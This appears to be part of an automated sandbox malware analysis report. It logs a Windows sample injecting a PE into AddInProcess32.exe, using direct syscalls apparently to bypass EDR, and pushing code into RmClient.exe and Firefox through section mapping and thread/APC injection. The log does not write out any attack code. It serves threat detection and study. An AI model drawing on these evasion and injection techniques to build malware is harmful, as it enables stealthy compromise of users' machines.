Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CEB1D mov eax, dword ptr fs:[00000030h]	3_2_019CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CEB1D mov eax, dword ptr fs:[00000030h]	3_2_019CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CEB1D mov eax, dword ptr fs:[00000030h]	3_2_019CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CEB1D mov eax, dword ptr fs:[00000030h]	3_2_019CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CEB1D mov eax, dword ptr fs:[00000030h]	3_2_019CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CEB1D mov eax, dword ptr fs:[00000030h]	3_2_019CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CEB1D mov eax, dword ptr fs:[00000030h]	3_2_019CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CEB1D mov eax, dword ptr fs:[00000030h]	3_2_019CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CEB1D mov eax, dword ptr fs:[00000030h]	3_2_019CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A18B28 mov eax, dword ptr fs:[00000030h]	3_2_01A18B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A18B28 mov eax, dword ptr fs:[00000030h]	3_2_01A18B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A24B00 mov eax, dword ptr fs:[00000030h]	3_2_01A24B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197EB20 mov eax, dword ptr fs:[00000030h]	3_2_0197EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197EB20 mov eax, dword ptr fs:[00000030h]	3_2_0197EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01948B50 mov eax, dword ptr fs:[00000030h]	3_2_01948B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FEB50 mov eax, dword ptr fs:[00000030h]	3_2_019FEB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F8B42 mov eax, dword ptr fs:[00000030h]	3_2_019F8B42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E6B40 mov eax, dword ptr fs:[00000030h]	3_2_019E6B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E6B40 mov eax, dword ptr fs:[00000030h]	3_2_019E6B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1AB40 mov eax, dword ptr fs:[00000030h]	3_2_01A1AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194CB7E mov eax, dword ptr fs:[00000030h]	3_2_0194CB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A04B4B mov eax, dword ptr fs:[00000030h]	3_2_01A04B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A04B4B mov eax, dword ptr fs:[00000030h]	3_2_01A04B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A22B57 mov eax, dword ptr fs:[00000030h]	3_2_01A22B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A22B57 mov eax, dword ptr fs:[00000030h]	3_2_01A22B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A22B57 mov eax, dword ptr fs:[00000030h]	3_2_01A22B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A22B57 mov eax, dword ptr fs:[00000030h]	3_2_01A22B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01988A90 mov edx, dword ptr fs:[00000030h]	3_2_01988A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195EA80 mov eax, dword ptr fs:[00000030h]	3_2_0195EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195EA80 mov eax, dword ptr fs:[00000030h]	3_2_0195EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195EA80 mov eax, dword ptr fs:[00000030h]	3_2_0195EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195EA80 mov eax, dword ptr fs:[00000030h]	3_2_0195EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195EA80 mov eax, dword ptr fs:[00000030h]	3_2_0195EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195EA80 mov eax, dword ptr fs:[00000030h]	3_2_0195EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195EA80 mov eax, dword ptr fs:[00000030h]	3_2_0195EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195EA80 mov eax, dword ptr fs:[00000030h]	3_2_0195EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195EA80 mov eax, dword ptr fs:[00000030h]	3_2_0195EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A24A80 mov eax, dword ptr fs:[00000030h]	3_2_01A24A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01958AA0 mov eax, dword ptr fs:[00000030h]	3_2_01958AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01958AA0 mov eax, dword ptr fs:[00000030h]	3_2_01958AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019A6AA4 mov eax, dword ptr fs:[00000030h]	3_2_019A6AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01950AD0 mov eax, dword ptr fs:[00000030h]	3_2_01950AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01984AD0 mov eax, dword ptr fs:[00000030h]	3_2_01984AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01984AD0 mov eax, dword ptr fs:[00000030h]	3_2_01984AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019A6ACC mov eax, dword ptr fs:[00000030h]	3_2_019A6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019A6ACC mov eax, dword ptr fs:[00000030h]	3_2_019A6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019A6ACC mov eax, dword ptr fs:[00000030h]	3_2_019A6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198AAEE mov eax, dword ptr fs:[00000030h]	3_2_0198AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198AAEE mov eax, dword ptr fs:[00000030h]	3_2_0198AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019DCA11 mov eax, dword ptr fs:[00000030h]	3_2_019DCA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01974A35 mov eax, dword ptr fs:[00000030h]	3_2_01974A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01974A35 mov eax, dword ptr fs:[00000030h]	3_2_01974A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197EA2E mov eax, dword ptr fs:[00000030h]	3_2_0197EA2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198CA24 mov eax, dword ptr fs:[00000030h]	3_2_0198CA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01956A50 mov eax, dword ptr fs:[00000030h]	3_2_01956A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01956A50 mov eax, dword ptr fs:[00000030h]	3_2_01956A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01956A50 mov eax, dword ptr fs:[00000030h]	3_2_01956A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01956A50 mov eax, dword ptr fs:[00000030h]	3_2_01956A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01956A50 mov eax, dword ptr fs:[00000030h]	3_2_01956A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01956A50 mov eax, dword ptr fs:[00000030h]	3_2_01956A50

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: NULL target: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: NULL target: C:\Windows\SysWOW64\RmClient.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: NULL target: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: NULL target: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\RmClient.exe

Thread register set: target process: 5376

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\RmClient.exe

Thread APC queued: target process: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 10E2008	Jump to behavior

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Process created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: ONQMbShhwr.exe, 00000006.00000000.2383715683.00000000017F0000.00000002.00000001.00040000.00000000.sdmp, ONQMbShhwr.exe, 00000006.00000002.2926546715.00000000017F0000.00000002.00000001.00040000.00000000.sdmp, ONQMbShhwr.exe, 00000009.00000002.2926947076.0000000001340000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ONQMbShhwr.exe, 00000006.00000000.2383715683.00000000017F0000.00000002.00000001.00040000.00000000.sdmp, ONQMbShhwr.exe, 00000006.00000002.2926546715.00000000017F0000.00000002.00000001.00040000.00000000.sdmp, ONQMbShhwr.exe, 00000009.00000002.2926947076.0000000001340000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: ONQMbShhwr.exe, 00000006.00000000.2383715683.00000000017F0000.00000002.00000001.00040000.00000000.sdmp, ONQMbShhwr.exe, 00000006.00000002.2926546715.00000000017F0000.00000002.00000001.00040000.00000000.sdmp, ONQMbShhwr.exe, 00000009.00000002.2926947076.0000000001340000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: ONQMbShhwr.exe, 00000006.00000000.2383715683.00000000017F0000.00000002.00000001.00040000.00000000.sdmp, ONQMbShhwr.exe, 00000006.00000002.2926546715.00000000017F0000.00000002.00000001.00040000.00000000.sdmp, ONQMbShhwr.exe, 00000009.00000002.2926947076.0000000001340000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Users\user\Desktop\0Z2lZiPk5K.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
